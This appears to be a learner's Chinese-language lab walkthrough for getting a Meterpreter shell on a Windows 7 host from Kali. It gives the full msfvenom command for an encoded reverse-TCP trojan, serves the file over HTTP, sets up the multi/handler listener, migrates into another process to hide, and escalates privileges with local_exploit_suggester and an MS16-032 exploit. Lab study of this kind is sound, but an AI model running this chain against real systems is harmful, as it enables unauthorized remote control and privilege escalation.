实验环境:
A:Kali 192.168.78.131 攻击机
B:win7 192.168.78.128 受害机
先来一个简单的拿 shell 吧
1.在Kali开启 MSF
2.进入监听模块
use exploit/multi/handler
3.利用 msfvenom 制作木马程序
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.78.131 lport=4444 -b"\x00" -e x86/shikata_ga_nai -f exe > msf.exe
参数说明:
- -p payload
- -e:编码方式。
- -i:编码次数。
- -b:在生成的程序中避免出现的值。
-
-f exe: 生成 exe 格式。
- -a:代表系统结构,需要和攻击机一样。
- -platform:平台选择 Windows
- -p windows/meterpreter/reverse_tcp 反弹
4.将木马传到主机:
这里使用 python2: python -m SimpleHTTPServer port |
python3:python -m http.server port 搭建一个HTTP服务,提供一个文件浏览的web页面到某端口。 |
在访问下载期间会有回显。
5.打开目标机,进入搭建地址下载木马:
6.返回第二步界面,设置监听主机
set lhost 192.168.78.131
7.查看配置
show options
在设置一个 payload:
set payload windows/meterpreter/reverse_tcp
再看看选项:
8.运行:run 或 exploit
9.在 win7 中运行我们的 msf.exe 木马,再次查看 msf 控制台
可以看到得到了session。
10.查看 session,如果此时是 meterpreter,输入 background 即可返回 msf exploit(multi/handler)。
这样我们就得到了一个普通的 session。
在 meterpreter 中看看身份:
在 background 返回 msf 界面后,可以 sessions
查看进程,然后 session -i id
来进入 meterpreter 界面。再输入 shell
可以进入 win7 的 shell。
当我们拿到 shell 后显示乱码,可以:
chcp 65001
隐藏自己 + 提权
隐藏自己
先 ps
查看当前所有的会话进程。
再用 migrate 1844
将进程迁移到会话对应的 id。
(目前不懂)
提权
返回 msf,使用 post/multi/recon/local_exploit_suggester
模块,查找目标机器未修补的漏洞:
use post/multi/recon/local_exploit_suggester
设置要攻击的会话 id:
set session 1
run
绿色代表对应的漏洞:
利用现有的漏洞提权 (复制冒号之前的就可以,如 👇)
#有的漏洞会失败,多试几个 成功后会返回 shell,否则就是失败了
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
show options
set session 2
run
再次查看我们的权限,可以看到提权成功。
提权详情 ——> here